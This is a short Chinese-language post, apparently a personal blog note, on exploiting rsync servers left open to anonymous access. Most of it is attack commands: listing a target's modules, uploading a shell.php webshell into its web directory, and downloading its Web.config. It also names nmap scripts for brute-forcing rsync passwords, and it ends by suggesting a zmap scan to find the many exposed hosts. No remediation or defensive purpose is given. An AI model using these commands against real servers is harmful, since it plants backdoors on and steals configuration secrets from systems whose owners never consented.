rsync 匿名访问

最近看 wooyun hot bugs,关注到这个问题,感觉引起的危害还是比较大的,而且很多管理员也没有注意到。

基本语句:

rsync X.X.X.X::                                             //列模块
rsync /tmp/shell.php X.X.X.X::web/                          //写文件
rsync -avz X.X.X.X::web/Web.config /tmp/Web.config          //下载文件

有用的脚本:

  • /usr/local/share/nmap/scripts/rsync-brute.nse //暴力破解密码
  • /usr/local/share/nmap/scripts/rsync-list-modules.nse //列模块

实例就不来了,zmap 扫描下端口,很多的。